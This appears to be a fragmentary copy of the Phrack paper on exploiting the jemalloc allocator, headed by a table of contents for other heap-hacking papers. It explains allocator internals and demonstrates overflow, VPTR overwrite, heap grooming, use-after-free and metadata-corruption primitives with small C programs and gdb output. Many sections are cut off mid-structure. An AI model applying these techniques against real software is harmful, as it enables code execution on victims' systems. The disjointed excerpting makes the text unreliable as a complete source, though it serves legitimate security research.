Heap Hacking
Contents
1. Pseudomonarchia jemallocum – argp, huku
2. The House Of Lore: Reloaded - blackngel
3. Malloc des-maleficarum - blackngel
4. Yet another free() exploitation technique - huku
5. The use of set_head to defeat the wilderness – g463
6. OS X heap exploitation techniques - nemo
7. Advanced Doug Lea's malloc exploits - jp
8. The Malloc Maleficarum - Phantasmal Phantasmagoria
9. Exploiting The Wilderness - Phantasmal Phantasmagoria
1. Pseudomonarchia jemallocum – argp, huku
==Phrack Inc.==
|=-----------------------------------------------------------------------=|
|=-------------------=[ Pseudomonarchia jemallocum ]=--------------------=|
|=-----------------------------------------------------------------------=|
|=---------------=[ The false kingdom of jemalloc, or ]=------------------|
|=-----------=[ On exploiting the jemalloc memory manager ]=-------------=|
|=-----------------------------------------------------------------------=|
|=------------------------=[ argp | huku ]=------------------------=|
|=--------------------=[ {argp,huku}@grhack.net ]=---------------------=|
|=-----------------------------------------------------------------------=|
1 - Introduction
1.1 - Thousand-faced jemalloc
2 - jemalloc memory allocator overview
2.1 - Basic structures
2.1.1 - Chunks (arena_chunk_t)
2.1.2 - Arenas (arena_t)
2.1.3 - Runs (arena_run_t)
2.1.4 - Regions/Allocations
2.1.5 - Bins (arena_bin_t)
2.1.6 - Huge allocations
2.1.7 - Thread caches (tcache_t)
2.1.8 - Unmask jemalloc
2.2 - Algorithms
3 - Exploitation tactics
3.1 - Adjacent region corruption
3.2 - Heap manipulation
3.3 - Metadata corruption
3.3.1 - Run (arena_run_t)
3.3.2 - Chunk (arena_chunk_t)
3.3.3 - Thread caches (tcache_t)
4 - A real vulnerability
5 - Future work
6 - Conclusion
7 - References
8 - Code
--[ 1 - Introduction
All the above have led to a few versions of jemalloc that are very
similar but not exactly the same. To summarize, there are three different
widely used versions of jemalloc: 1) the standalone version [JESA],
2) the version in the Mozilla Firefox web browser [JEMF], and 3) the
FreeBSD libc [JEFB] version.
There are so many different jemalloc versions that we almost went crazy
double checking everything in all possible platforms. Specifically, we
tested the latest standalone jemalloc version (2.2.3 at the time of this
writing), the version included in the latest FreeBSD libc (8.2-RELEASE),
and the Mozilla Firefox web browser version 11.0. Furthermore, we also
tested the Linux port of the FreeBSD malloc(3) implementation
(jemalloc_linux_20080828a in the accompanying code archive) [JELX].
Before we start our analysis we would like to point out that jemalloc (as
well as other malloc implementations) does not implement concepts like
'unlinking' or 'frontlinking' which have proven to be catalytic for the
exploitation of dlmalloc and Microsoft Windows allocators. That said, we
would like to stress the fact that the attacks we are going to present do
not directly achieve a write-4-anywhere primitive. We, instead, focus on
how to force malloc() (and possibly realloc()) to return a chunk that will
most likely point to an already initialized memory region, in hope that
the region in question may hold objects important for the functionality
of the target application (C++ VPTRs, function pointers, buffer sizes and
so on). Considering the various anti-exploitation countermeasures present
in modern operating systems (ASLR, DEP and so on), we believe that such
an outcome is far more useful for an attacker than a 4 byte overwrite.
algorithm. For the latter two cases, the association between a thread
and an arena doesn't stay the same for the whole life of the thread.
Chunk #0 Chunk #1
.--------------------------------. .--------------------------------.
| | | |
| Run #0 Run #1 | | Run #0 Run #1 |
| .-------------..-------------. | | .-------------..-------------. |
| | || | | | | || | |
| | Page || Page | | | | Page || Page | |
| | .---------. || .---------. | | | | .---------. || .---------. | |
| | | | || | | | | | | | | || | | | | ...
| | | Regions | || | Regions | | | | | | Regions | || | Regions | | |
| | |[] [] [] | || |[] [] [] | | | | | |[] [] [] | || |[] [] [] | | |
| | | ^ ^ | || | | | | | | | ^ ^ | || | | | |
| | `-|-----|-' || `---------' | | | | `-|-----|-' || `---------' | |
| `---|-----|---'`-------------' | | `---|-----|---'`-------------' |
`-----|-----|--------------------' `-----|-----|--------------------'
| | | |
| | | |
.---|-----|----------. .---|-----|----------.
| | | | | | | |
| free regions' tree | ... | free regions' tree | ...
| | | |
`--------------------' `--------------------'
bin[Chunk #0][Run #0] bin[Chunk #1][Run #0]
If you are familiar with Linux heap exploitation (and more precisely with
dlmalloc internals) you have probably heard of the term 'chunk' before. In
dlmalloc, the term 'chunk' is used to denote the memory regions returned
by malloc(3) to the end user. We hope you get over it soon because when it
comes to jemalloc the term 'chunk' is used to describe big virtual memory
regions that the memory allocator conceptually divides available memory
into. The size of the chunk regions may vary depending on the jemalloc
variant used. For example, on FreeBSD 8.2-RELEASE, a chunk is a 1 MB region
(aligned to its size), while on the latest FreeBSD (in CVS at the time of
this writing) a jemalloc chunk is a region of size 2 MB. Chunks are the
highest abstraction used in jemalloc's design, that is the rest of the
structures described in the following paragraphs are actually placed within
a chunk somewhere in the target's memory.
The following are the chunk sizes in the jemalloc variants we have
examined:
+--------------------------+------------+
| jemalloc variant         | Chunk size |
+--------------------------+------------+
| FreeBSD 8.2-RELEASE      | 1 MB       |
| Standalone v2.2.3        | 4 MB       |
| jemalloc_linux_20080828a | 1 MB       |
| Mozilla Firefox v5.0     | 1 MB       |
| Mozilla Firefox v7.0.1   | 1 MB       |
| Mozilla Firefox v11.0    | 1 MB       |
+--------------------------+------------+
An area of jemalloc managed memory divided into chunks looks like the
following diagram. We assume a chunk size of 4 MB; remember that chunks are
aligned to their size. The address 0xb7000000 does not have a particular
significance apart from illustrating the offsets between each chunk.
+-------------------------------------------------------------------------+
| Chunk alignment | Chunk content |
+-------------------------------------------------------------------------+
| Chunk #1 starts at: 0xb7000000 [ Arena ]
| Chunk #2 starts at: 0xb7400000 [ Arena ]
| Chunk #3 starts at: 0xb7800000 [ Arena ]
| Chunk #4 starts at: 0xb7c00000 [ Arena ]
| Chunk #5 starts at: 0xb8000000 [ Huge allocation region, see below ]
| Chunk #6 starts at: 0xb8400000 [ Arena ]
| Chunk #7 starts at: 0xb8800000 [ Huge allocation region ]
| Chunk #8 starts at: 0xb8c00000 [ Huge allocation region ]
| Chunk #9 starts at: 0xb9000000 [ Arena ]
+-------------------------------------------------------------------------+
Huge allocation regions are memory regions managed by jemalloc chunks that
satisfy huge malloc(3) requests. Apart from the huge size class, jemalloc
also has the small/medium and large size classes for end user allocations
(both managed by arenas). We analyze jemalloc's size classes of regions in
subsection 2.1.4.
[2-1]
    /*
     * Whether this chunk contained at some point one or more dirty pages.
     */
    bool dirtied;

    /*
     * A chunk map element corresponds to a page of this chunk. The map
     * keeps track of free and large/small regions.
     */
    arena_chunk_map_t map[];
};
The main use of chunk maps in combination with the memory alignment of the
chunks is to enable constant time access to the management metadata of free
and large/small heap allocations (regions).
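As an illustration of this constant time access, here is a minimal sketch of
the pointer arithmetic involved (our own example, not jemalloc code; the
4 MB chunk size and 4 KB page size are assumptions):

#include <stdint.h>
#include <stdio.h>

#define PAGE_SHIFT 12                          /* assumed 4 KB pages */

int main(void)
{
    size_t    chunksize = 4UL * 1024 * 1024;   /* e.g. standalone v2.2.3 */
    uintptr_t ptr       = 0xb7003040;          /* some region address */

    /* Chunks are aligned to their size, so masking the low bits of any
     * address inside a chunk recovers the chunk (and its header) base.
     */
    uintptr_t chunk = ptr & ~((uintptr_t)chunksize - 1);

    /* The page index within the chunk selects the map[] element that
     * describes the allocation this address belongs to.
     */
    size_t pageind = (ptr - chunk) >> PAGE_SHIFT;

    printf("chunk = 0x%lx, map index = %lu\n",
        (unsigned long)chunk, (unsigned long)pageind);

    return 0;
}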
Arenas are the central jemalloc data structures as they are used to manage
the chunks (and the underlying pages) that are responsible for the small
and large allocation size classes. Specifically, the arena structure is
defined as follows:
[2-2]
    /*
     * Chunks that contain dirty pages managed by this arena. When jemalloc
     * requires new pages these are allocated first from the dirty pages.
     */
    ql_head(arena_chunk_t) chunks_dirty;

    /*
     * Each arena has a spare chunk in order to cache the most recently
     * freed chunk.
     */
    arena_chunk_t *spare;

    /*
     * Ordered tree of this arena's available clean runs, i.e. runs
     * associated with clean pages.
     */
    arena_avail_tree_t runs_avail_clean;

    /*
     * Ordered tree of this arena's available dirty runs, i.e. runs
     * associated with dirty pages.
     */
    arena_avail_tree_t runs_avail_dirty;

    /*
     * Bins are used to store structures of free regions managed by this
     * arena.
     */
    arena_bin_t bins[];
};
arena_t **arenas;
unsigned narenas;
The main responsibility of a run is to keep track of the state (i.e. free
or used) of end user memory allocations, or regions as these are called in
jemalloc terminology. Each run holds regions of a specific size (however
within the small and large size classes as we have mentioned) and their
state is tracked with a bitmask. This bitmask is part of a run's metadata;
these metadata are defined with the following structure:
[2-3]
    /*
     * The index of the next region of the run that is free. On the FreeBSD
     * and Firefox flavors of jemalloc this variable is named regs_minelm.
     */
    uint32_t nextind;

    /*
     * Bitmask for the regions in this run. Each bit corresponds to one
     * region. A 0 bit means that the region is used, and a 1 bit means
     * that the corresponding region is free. The variable nextind (or
     * regs_minelm on FreeBSD and Firefox) is the index of the first
     * non-zero element of this array.
     */
    unsigned regs_mask[];
};
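To make the bitmask bookkeeping concrete, the following sketch shows how a
set bit translates into a region address. It is our own simplified example
(32-bit mask elements assumed); 'reg0_offset' and 'reg_size' come from the
owning bin, described in 2.1.5:

#include <stdint.h>
#include <stddef.h>
#include <strings.h>    /* ffs() */

/* Return a pointer to the first free region of a run, or NULL if the run
 * is full. The caller passes the run header address, its bitmask, the
 * number of mask elements and the bin's reg0_offset/reg_size values.
 */
static void *
first_free_region(void *run, unsigned *regs_mask, unsigned nelms,
    uint32_t reg0_offset, size_t reg_size)
{
    unsigned i;

    for (i = 0; i < nelms; i++) {
        if (regs_mask[i] != 0) {
            unsigned bit    = ffs((int)regs_mask[i]) - 1;  /* 1 == free */
            unsigned regind = (i * 32) + bit;              /* 32 bits/element */

            return (char *)run + reg0_offset + (regind * reg_size);
        }
    }

    return NULL;
}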
In jemalloc the term 'regions' applies to the end user memory areas
returned by malloc(3). As we have briefly mentioned earlier, regions are
divided into three classes according to their size, namely a) small/medium,
b) large and c) huge.
Huge regions are considered those that are bigger than the chunk size minus
the size of some jemalloc headers. For example, in the case that the chunk
size is 4 MB (4096 KB) then a huge region is an allocation greater than
4078 KB. Small/medium are the regions that are smaller than a page. Large
are the regions that are smaller than the huge regions (chunk size minus
some headers) and also larger than the small/medium regions (page size).
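As a rough illustration of these boundaries (our own sketch; the exact
header overhead differs per flavor, here we reuse the 4 MB / 4078 KB example
from above and assume 4 KB pages):

#include <stddef.h>

#define PAGE_SIZE  4096UL
#define CHUNK_SIZE (4UL * 1024 * 1024)
#define CHUNK_HDRS (18UL * 1024)  /* assumed header overhead (4096 KB - 4078 KB) */

enum size_class { SMALL_MEDIUM, LARGE, HUGE };

static enum size_class
classify(size_t size)
{
    if (size > CHUNK_SIZE - CHUNK_HDRS)
        return HUGE;          /* dedicated contiguous chunks, global tree */
    if (size > PAGE_SIZE)
        return LARGE;         /* gets its own run, metadata in chunk header */
    return SMALL_MEDIUM;      /* shares a run with regions of the same size */
}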
Huge regions have their own metadata and are managed separately from
small/medium and large regions. Specifically, they are managed by a
global to the allocator red-black tree and they have their own dedicated
and contiguous chunks. Large regions have their own runs, that is each
large allocation has a dedicated run. Their metadata are situated on
the corresponding arena chunk header. Small/medium regions are placed
on different runs according to their specific size. As we have seen in
2.1.3, each run has its own header in which there is a bitmask array
specifying the free and the used regions in the run.
In the standalone flavor of jemalloc the smallest run is that for regions
of size 4 bytes. The next run is for regions of size 8 bytes, the next
for 16 bytes, and so on.
Bins are used by jemalloc to store free regions. Bins organize the free
regions via runs and also keep metadata about their regions, like for
example the size class, the total number of regions, etc. A specific bin
may be associated with several runs, however a specific run can only be
associated with a specific bin, i.e. there is a one-to-many correspondence
between bins and runs. Bins have their associated runs organized in a tree.
Each bin has an associated size class and stores/manages regions of this
size class. A bin's regions are managed and accessed through the bin's
runs. Each bin has a member element representing the most recently used run
of the bin, called 'current run' with the variable name runcur. A bin also
has a tree of runs with available/free regions. This tree is used when the
current run of the bin is full, that is it doesn't have any free regions.
[2-4]
    /*
     * The current run of the bin that manages regions of this bin's size
     * class.
     */
    arena_run_t *runcur;

    /*
     * The tree of the bin's associated runs (all responsible for regions
     * of this bin's size class of course).
     */
    arena_run_tree_t runs;

    /*
     * The total size of a run of this bin. Remember that each run may be
     * comprised of more than one page.
     */
    size_t run_size;

    /*
     * The total number of elements in the regs_mask array of a run of this
     * bin. See 2.1.3 for more information on regs_mask.
     */
    uint32_t regs_mask_nelms;

    /*
     * The offset of the first region in a run of this bin. This can be
     * non-zero due to alignment requirements.
     */
    uint32_t reg0_offset;
};
one = malloc(2);
two = malloc(8);
three = malloc(16);
Using gdb let's explore jemalloc's structures. First let's see the runs
that the above allocations created in their corresponding bins:
We can see that our three allocations of sizes 2, 8 and 16 bytes resulted
in jemalloc creating runs for these size classes. Specifically, 'bin[0]'
is responsible for the size class 2 and its current run is at 0xb7d01000,
'bin[1]' is responsible for the size class 4 and doesn't have a current
run since no allocations of size 4 were made, 'bin[2]' is responsible
for the size class 8 with its current run at 0xb7d02000, and so on. In the
code archive you can find a Python script for gdb named unmask_jemalloc.py
for easily enumerating the size of bins and other internal information in
the various jemalloc flavors (see 2.1.8 for a sample run).
.----------------------------------. .---------------------------.
.----------------------------------. | +--+-----> arena_chunk_t |
.---------------------------------. | | | | |
| arena_t | | | | | .---------------------. |
| | | | | | | | |
| .--------------------. | | | | | | arena_run_t | |
| | arena_chunk_t list |-----+ | | | | | | | |
| `--------------------' | | | | | | | .-----------. | |
| | | | | | | | | page | | |
| arena_bin_t bins[]; | | | | | | | +-----------+ | |
| .------------------------. | | | | | | | | region | | |
| | bins[0] ... bins[27] | | | | | | | | +-----------+ | |
| `------------------------' | | |.' | | | | region | | |
| | | |.' | | | +-----------+ | |
`-----+----------------------+----' | | | | region | | |
| | | | | +-----------+ | |
| | | | | . . . | |
| v | | | .-----------. | |
| .-------------------. | | | | page | | |
| | .---------------. | | | | +-----------+ | |
| | | arena_chunk_t |-+---+ | | | region | | |
| | `---------------' | | | +-----------+ | |
| [2-5] | .---------------. | | | | region | | |
| | | arena_chunk_t | | | | +-----------+ | |
| | `---------------' | | | | region | | |
| | . . . | | | +-----------+ | |
| | .---------------. | | | | |
| | | arena_chunk_t | | | `---------------------' |
| | `---------------' | | [2-6] |
| | . . . | | .---------------------. |
| `-------------------' | | | |
| +----+--+---> arena_run_t | |
| | | | | |
+----------+ | | | .-----------. | |
| | | | | page | | |
| | | | +-----------+ | |
| | | | | region | | |
v | | | +-----------+ | |
.--------------------------. | | | | region | | |
| arena_bin_t | | | | +-----------+ | |
| bins[0] (size 8) | | | | | region | | |
| | | | | +-----------+ | |
| .----------------------. | | | | . . . | |
| | arena_run_t *runcur; |-+---------+ | | .-----------. | |
| `----------------------' | | | | page | | |
`--------------------------' | | +-----------+ | |
| | | region | | |
| | +-----------+ | |
| | | region | | |
| | +-----------+ | |
| | | region | | |
| | +-----------+ | |
| | | |
| `---------------------' |
`---------------------------'
Huge allocations are not very interesting for the attacker but they are an
integral part of jemalloc which may affect the exploitation process. Simply
put, huge allocations are represented by 'extent_node_t' structures that
are ordered in a global red black tree which is common to all threads.
[2-7]
/* Tree of extents. */
typedef struct extent_node_s extent_node_t;
struct extent_node_s {
#ifdef MALLOC_DSS
/* Linkage for the size/address-ordered tree. */
rb_node(extent_node_t) link_szad;
#endif
malloc_mutex_lock(&huge_mtx);
extent_tree_ad_insert(&huge, node);
The most interesting thing about huge allocations is the fact that free
base nodes are kept in a simple array of pointers called 'base_nodes'. The
aforementioned array, although defined as a simple pointer, is handled
as if it were a two-dimensional array holding pointers to available base
nodes.
static extent_node_t *
base_node_alloc(void)
{
    extent_node_t *ret;

    malloc_mutex_lock(&base_mtx);

    if (base_nodes != NULL) {
        ret = base_nodes;
        base_nodes = *(extent_node_t **)ret;
        ...
    }
    ...
}

static void
base_node_dealloc(extent_node_t *node)
{
    malloc_mutex_lock(&base_mtx);

    *(extent_node_t **)node = base_nodes;
    base_nodes = node;
    ...
}
1) A multicore system is the reason jemalloc allocates more than one arena.
On a unicore system there's only one available arena, even on multithreaded
applications. However, the Firefox jemalloc variant has just one arena
hardcoded, therefore it has no thread caches.
void *
arena_malloc(arena_t *arena, size_t size, bool zero)
{
...
In this section we will analyze thread magazines, but the exact same
principles apply to the tcaches (the change in the nomenclature is probably
the most notable difference between them).
The following figure depicts the relationship between the various thread
magazines' structures.
.-------------------------------------------.
| mag_rack_t |
| |
| bin_mags_t bin_mags[]; |
| |
| .-------------------------------------. |
| | bin_mags[0] ... bin_mags[nbins - 1] | |
| `-------------------------------------' |
`--------|----------------------------------'
|
| .------------------.
| +----------->| mag_t |
v | | |
.----------------------. | | void *rounds[] |
| bin_mags_t | | | ... |
| | | `------------------'
| .----------------. | |
| | mag_t *curmag; |-----------+
| `----------------' |
| ... |
`----------------------'
/*
 * Magazines are lazily allocated, but once created, they remain until the
 * associated mag_rack is destroyed.
 */
typedef struct bin_mags_s bin_mags_t;

struct bin_mags_s {
    mag_t *curmag;
    mag_t *sparemag;
};
void
mag_load(mag_t *mag)
{
    arena_t *arena;
    arena_bin_t *bin;
    arena_run_t *run;
    void *round;
    size_t i;

    ...

        if (round == NULL)
            break;
        ...
    mag->nrounds = i;
}

/* Just return the next available void pointer. It points to one of the
 * preallocated memory regions.
 */
void *
mag_alloc(mag_t *mag)
{
    if (mag->nrounds == 0)
        return (NULL);

    mag->nrounds--;

    return (mag->rounds[mag->nrounds]);
}
The most notable thing about magazines is the fact that 'rounds', the array
of void pointers, as well as all the related thread metadata (magazine
racks, magazine bins and so on) are allocated by normal calls to functions
'arena_bin_malloc_xxx()' ([3-23], [3-24]). This results in the thread
metadata lying around normal memory regions.
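A quick way to see why this matters is the following toy simulation (ours;
'mag_t' below is a stand-in, not jemalloc's real definition): if an overflow
from a neighboring region reaches the 'rounds[]' array, the next allocation
served from that magazine is an arbitrary attacker-supplied pointer.

#include <stdio.h>
#include <stddef.h>

/* Stand-in for jemalloc's mag_t: just enough to show the idea. */
typedef struct {
    size_t nrounds;
    void *rounds[4];
} mag_t;

static void *
mag_alloc(mag_t *mag)
{
    if (mag->nrounds == 0)
        return NULL;
    mag->nrounds--;
    return mag->rounds[mag->nrounds];
}

int main(void)
{
    mag_t mag = { 1, { 0 } };

    /* Simulate an overflow from an adjacent region that overwrites the
     * cached round pointer with an arbitrary address.
     */
    mag.rounds[0] = (void *)0x41414141;

    printf("next 'region' handed out: %p\n", mag_alloc(&mag));

    return 0;
}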
As we are sure you are all aware, since version 7.0, gdb can be scripted
with Python. In order to unmask and bring to light the internals of the
various jemalloc flavors, we have developed a Python script for gdb
appropriately named unmask_jemalloc.py. The following is a sample run of
the script on Firefox 11.0 on Linux x86 (edited for readability):
$ ./firefox-bin &
$ open firefox-11.0.app
...
Attaching to process 837
[New Thread 0x2003 of process 837]
[New Thread 0x2103 of process 837]
[New Thread 0x2203 of process 837]
[New Thread 0x2303 of process 837]
[New Thread 0x2403 of process 837]
[New Thread 0x2503 of process 837]
[New Thread 0x2603 of process 837]
[New Thread 0x2703 of process 837]
[New Thread 0x2803 of process 837]
[New Thread 0x2903 of process 837]
[New Thread 0x2a03 of process 837]
[New Thread 0x2b03 of process 837]
[New Thread 0x2c03 of process 837]
[New Thread 0x2d03 of process 837]
[New Thread 0x2e03 of process 837]
Reading symbols from
/dbg/firefox-11.0.app/Contents/MacOS/firefox...done
Reading symbols from
/dbg/firefox-11.0.app/Contents/MacOS/firefox.dSYM/
Contents/Resources/DWARF/firefox...done.
0x00007fff8636b67a in ?? () from /usr/lib/system/libsystem_kernel.dylib
(gdb) source unmask_jemalloc.py
(gdb) unmask_jemalloc
MALLOC(size):
    IF size CAN BE SERVICED BY AN ARENA:
        IF size IS SMALL OR MEDIUM:
            bin = get_bin_for_size(size)
            ...
            bit = get_first_set_bit(run->regs_mask)
            region = get_region(run, bit)
            ...

CALLOC(n, size):
    RETURN MALLOC(n * size)

FREE(addr):
    IF addr IS NOT EQUAL TO THE CHUNK IT BELONGS TO:
        IF addr IS A SMALL ALLOCATION:
            run = get_run_addr_belongs_to(addr);
            bin = run->bin;
            size = bin->reg_size;
            element = get_element_index(addr, run, bin)
            unset_bit(run->regs_mask[element])
            ...
abstractly and identify primitives that can be applied to new targets. We have
used this approach before, comparing FreeBSD and Linux kernel heap
exploitation [HAPF, APHN]. Regarding jemalloc, we analyze adjacent data
corruption, heap manipulation and metadata corruption exploitation
primitives.
The main idea behind adjacent heap item corruptions is that you exploit the
fact that the heap manager places user allocations next to each other
contiguously without other data in between. In jemalloc regions of the same
size class are placed on the same bin. In the case that they are also
placed on the same run of the bin then there are no inline metadata between
them. In 3.2 we will see how we can force this, but for now let's assume
that new allocations of the same size class are placed in the same run.
one = malloc(0x10);
memset(one, 0x41, 0x10);
printf("[+] region one:\t\t0x%x: %s\n", (unsigned int)one, one);
two = malloc(0x10);
memset(two, 0x42, 0x10);
printf("[+] region two:\t\t0x%x: %s\n", (unsigned int)two, two);
three = malloc(0x10);
memset(three, 0x43, 0x10);
printf("[+] region three:\t0x%x: %s\n", (unsigned int)three, three);
[3-1]
[3-2]
free(one);
free(two);
free(three);
[3-3]
Examining the above we can see that region 'one' is at 0xb7003030 and that
the following two allocations (regions 'two' and 'three') are in the same
run immediately after 'one' and all three next to each other without any
metadata in between them. After the overflow of 'two' with 30 'X's we can
see that region 'three' has been overwritten with 14 'X's (30 - 16 for the
size of region 'two').
At breakpoint [3-1]:
At 0xb7003000 is the current run of the bin bins[2] that manages the size
class 16 in the standalone jemalloc flavor that we have linked against.
Let's take a look at the run's contents:
After some initial metadata (the run's header which we will see in more
detail at 3.3.1) we have region 'one' at 0xb7003030 followed by regions
'two' and 'three', all of size 16 bytes. Again we can see that there are no
metadata between the regions. Continuing to breakpoint [3-2] and examining
again the contents of the run:
We can see that our 30 'X's (0x58) have overwritten the complete 16 bytes
of region 'two' at 0xb7003040 and continued for 15 bytes (14 plus a NULL
from strcpy(3)) in region 'three' at 0xb7003050. From this memory dump it
should be clear why the printf(3) call of region 'one' after the overflow
continues to print all 46 bytes (16 from region 'one' plus 30 from the
overflow) up to the NULL placed by the strcpy(3) call. As it has been
demonstrated by Peter Vreugdenhil in the context of Internet Explorer heap
overflows [PV10], this can lead to information leaks from the region that
is adjacent to the region with the string whose terminating NULL has been
overwritten. You just need to read back the string and you will get all
data up to the first encountered NULL.
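A minimal sketch of this leak primitive (our own toy example, assuming the
two regions end up adjacent in the same run as demonstrated above): once the
overflow has removed the terminating NULL, reading the string back walks
straight into the neighboring region.

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main(void)
{
    char *one = malloc(16);
    char *two = malloc(16);      /* holds the "secret" we want to leak */

    strcpy(two, "SECRETDATA");
    memset(one, 'A', 16);        /* 16 non-NULL bytes: no terminator left */

    /* Reading 'one' back as a string now also returns the contents of
     * 'two', up to the first NULL encountered there.
     */
    printf("leak: %s\n", one);

    return 0;
}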
We can see that jemalloc does not clear the freed regions. This behavior of
leaving stale data in regions that have been freed and can be allocated
again can lead to easier exploitation of use-after-free bugs (see next
section).
class base
{
private:
    char buf[32];

public:
    void
    copy(const char *str)
    {
        strcpy(buf, str);
    }

    virtual void
    print(void)
    {
        printf("buf: 0x%08x: %s\n", buf, buf);
    }
};

class derived_a : public base
{
public:
    void
    print(void)
    {
        printf("[+] derived_a: ");
        base::print();
    }
};

class derived_b : public base
{
public:
    void
    print(void)
    {
        printf("[+] derived_b: ");
        base::print();
    }
};

int
main(int argc, char *argv[])
{
    base *obj_a;
    base *obj_b;

    obj_a = new derived_a;
    obj_b = new derived_b;

    if(argc == 3)
    {
        printf("[+] overflowing from obj_a into obj_b\n");

        obj_a->copy(argv[1]);
        obj_b->copy(argv[2]);

        obj_a->print();
        obj_b->print();

        return 0;
    }
$ gdb vuln-vptr
...
gdb $ r `python -c 'print "A" * 48'` `python -c 'print "B" * 10'`
...
0x804862f <main(int, char**)+15>: movl $0x24,(%esp)
0x8048636 <main(int, char**)+22>: call 0x80485fc <_Znwj@plt>
0x804863b <main(int, char**)+27>: movl $0x80489e0,(%eax)
gdb $ print $eax
$13 = 0xb7c01040
At 0x8048636 we can see the first 'new' call which takes as a parameter the
size of the object to create, that is 0x24 or 36 bytes. C++ will of course
use jemalloc to allocate the required amount of memory for this new object.
After the call instruction, EAX has the address of the allocated region
(0xb7c01040) and at 0x804863b the value 0x80489e0 is moved there. This is
the VPTR that points to 'print(void)' of 'obj_a':
Now it must be clear why even though the declared buffer is 32 bytes long,
there are 36 bytes allocated for the object. Exactly the same as above
happens with the second 'new' call, but this time the VPTR written is that
of 'obj_b' (which is at 0xb7c01070):
Our run is at 0xb7c01000 and the bin is bin[5] which handles regions of
size 0x30 (48 in decimal). Since our objects are of size 36 bytes they
don't fit in the previous bin, i.e. bin[4], of size 0x20 (32). We can see
'obj_a' at 0xb7c01040 with its VPTR (0x080489e0) and 'obj_b' at 0xb7c01070
with its own VPTR (0x080489f0).
Our next breakpoint is after the overflow of 'obj_a' into 'obj_b' and just
before the first call of 'print()'. Our run now looks like the following:
The following step is to deallocate every second region in this last series
of controlled victim allocations. This will create holes in between the
victim objects/structures on the run of the size class we are trying to
manipulate. Finally, we trigger the heap overflow bug forcing, due to the
state we have arranged, jemalloc to place the vulnerable objects in holes
on the target run overflowing into the victim objects.
char *foo[NALLOC];
char *bar[NALLOC];
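The relevant part of such a manipulation could look like the following
sketch (our own simplified version of the idea; NALLOC and the 16 byte size
class are assumptions matching the output below):

#include <stdio.h>
#include <stdlib.h>

#define NALLOC 512

int main(void)
{
    char *foo[NALLOC];
    char *bar[NALLOC];
    int i;

    /* step 1: controlled allocations of victim objects */
    for (i = 0; i < NALLOC; i++)
        foo[i] = malloc(16);

    /* step 2: free every second region, punching holes in the run(s) */
    for (i = 0; i < NALLOC; i += 2)
        free(foo[i]);

    /* step 3: subsequent allocations of the same size class land in the
     * holes, right next to the remaining victim objects.
     */
    for (i = 0; i < NALLOC / 2; i++)
        bar[i] = malloc(16);

    printf("bar[0] = %p\n", (void *)bar[0]);

    return 0;
}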
jemalloc's behavior can be observed in the output, remember that our target
size class is 16 bytes:
$ ./test-holes
step 1: controlled allocations of victim objects
foo[0]: 0x40201030
foo[1]: 0x40201040
foo[2]: 0x40201050
foo[3]: 0x40201060
foo[4]: 0x40201070
foo[5]: 0x40201080
foo[6]: 0x40201090
foo[7]: 0x402010a0
...
foo[447]: 0x40202c50
foo[448]: 0x40202c60
foo[449]: 0x40202c70
foo[450]: 0x40202c80
foo[451]: 0x40202c90
foo[452]: 0x40202ca0
foo[453]: 0x40202cb0
foo[454]: 0x40202cc0
foo[455]: 0x40202cd0
foo[456]: 0x40202ce0
foo[457]: 0x40202cf0
foo[458]: 0x40202d00
foo[459]: 0x40202d10
foo[460]: 0x40202d20
...
We can see that jemalloc works in a FIFO way; the first region freed is the
first returned for a subsequent allocation request. Although our example
mainly demonstrates how to manipulate the jemalloc heap to exploit adjacent
region corruptions, our observations can also help us to exploit
use-after-free vulnerabilities. When our goal is to get data of our own
choosing in the same region as a freed region about to be used, jemalloc's
FIFO behavior can help us place our data in a predictable way.
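For instance, a minimal use-after-free sketch (ours, not from the paper's
code archive) that relies on this FIFO reuse to place controlled data in the
dangling object:

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

struct victim {
    void (*callback)(void);
};

static void attacker(void) { printf("controlled code path reached\n"); }

int main(void)
{
    struct victim *v = malloc(sizeof(*v));
    void (*fp)(void) = attacker;

    free(v);                           /* 'v' is now a dangling pointer  */

    char *spray = malloc(sizeof(*v));  /* FIFO: reuses the region of 'v' */
    memcpy(spray, &fp, sizeof(fp));    /* attacker-controlled contents   */

    v->callback();                     /* use-after-free */

    return 0;
}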
For release builds the 'magic' field will not be present (that is,
MALLOC_DEBUG is off by default). As we have already mentioned, each
run contains a pointer to the bin whose regions it contains. The 'bin'
pointer is read and dereferenced from 'arena_run_t' (see [2-3]) only
during deallocation. On deallocation the region size is unknown, thus the
bin index cannot be computed directly; instead, jemalloc will first find
the run in which the memory to be freed is located and will then dereference
bin pointer stored in the run's header. From function 'arena_dalloc_small':
On the other hand, during the allocation process, once the appropriate run
is located, its 'regs_mask[]' bit vector is examined in search of a free
region. Note that the search for a free region starts at
'regs_mask[regs_minelm]' ('regs_minelm' holds the index of the first
'regs_mask[]' element that has nonzero bits). We will exploit this fact to
force 'malloc()' to return an already allocated region.
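A toy simulation of that effect (stand-in values, nothing here is real
allocator code): if the bit of an in-use region is flipped back to 1 in the
bitmask, the next scan happily hands the same region out a second time.

#include <stdio.h>
#include <strings.h>   /* ffs() */

int main(void)
{
    /* An imaginary 8-region run: regions 1..7 free, region 0 in use. */
    unsigned regs_mask = 0xfe;

    /* An attacker-controlled write (e.g. an overflow into the run header)
     * marks the in-use region 0 as free again.
     */
    regs_mask |= 1;

    int bit = ffs((int)regs_mask) - 1;
    printf("next allocation gets region index %d (already in use)\n", bit);

    return 0;
}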
Let's first have a look at what the in-memory model of a run looks like
(file test-run.c):
char *first;

first = (char *)malloc(16);
breakpoint();
free(first);
The call to malloc() returns the address 0x28201030 which belongs to the
run at 0x28201000.
Oki doki, run 0x28201000 services the requests for memory regions of size
16 as indicated by the 'reg_size' value of the bin pointer stored in the
run header (notice that run->bin->runcur == run).
Now let's proceed with studying a scenario that can lead to 'malloc()'
exploitation. For our example let's assume that the attacker controls
a memory region 'A' which is the last in its run.
In the simple diagram shown above, 'R' stands for a normal region which may
or may not be allocated while 'A' corresponds to the region that belongs to
the attacker, i.e. it is the one that will be overflown. 'A' does not
strictly need to be the last region of run #1. It can also be any region of
the run. Let's explore how from a region on run #1 we can reach the
metadata of run #2 (file test-runhdr.c, also see [2-6]):
one = malloc(0x10);
memset(one, 0x41, 0x10);
printf("[+] region one:\t\t0x%x: %s\n", (unsigned int)one, one);
two = malloc(0x10);
memset(two, 0x42, 0x10);
printf("[+] region two:\t\t0x%x: %s\n", (unsigned int)two, two);
three = malloc(0x20);
memset(three, 0x43, 0x20);
